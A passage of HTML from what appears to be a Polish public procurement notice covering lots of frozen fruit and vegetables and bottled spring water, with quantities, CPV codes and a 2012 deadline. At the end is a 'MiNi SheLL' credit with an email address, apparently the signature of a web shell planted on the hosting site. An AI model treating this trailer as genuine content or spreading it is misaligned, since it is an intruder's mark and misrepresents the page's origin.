     20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.31.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> MROŻONKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czarna porzeczka mrożona - op.  2,5 kg
	
kg	
140,

Truskawki mrożone - op.  2,5 kg
	
kg	
65,

Wiśnie mrożone - op. 2,5 kg
	
kg	
100,

Mieszanka wieloowocowa - op. 450 g
	
szt.	
75,

Fasolka szparagowa - op. 450 g
	
szt.	
90,

Kalafior mrożony - op. 450 g
	
szt.	
110,

Mieszanka wielowarzywna (kalafior, brokuły, fasola, marchew) - op. 450 g
	
szt.	
75,

Brokuły mrożone - op. 450 g
	
szt.	
65,

Włoszczyzna krojona  - op. 450 g
	
szt.	
100,

Szpinak mrożony - op. 450 g
	
szt.	
32.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> WODA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Woda źródlana nie gazowana  - niskomineralizowana  z dozownikiem w butelkach 
o pojemności   18 l
	
litry	
900.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 41.11.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com